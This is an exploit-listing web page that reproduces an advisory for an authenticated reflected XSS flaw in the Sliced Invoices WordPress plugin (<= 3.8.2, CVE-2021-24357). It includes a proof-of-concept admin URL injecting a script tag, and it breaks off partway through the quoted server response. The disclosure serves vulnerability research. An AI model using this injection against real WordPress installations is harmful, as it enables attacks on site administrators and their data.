Advertisement






Wordpress Sliced Invoices < = 3.8.2 Authenticated Reflected XSS

CVE Category Price Severity
CVE-2021-24357 CWE-79 Not specified High
Author Risk Exploitation Type Date
N/A High Authenticated Reflected XSS 2019-10-24
CPE
cpe:cpe:/a:wpackagist:wp-sliced-invoices:3.8.2
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100153

Below is a copy:

Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Reflected Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E
- The response will contain:
```
<body id="error-page">
<p>Cre

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum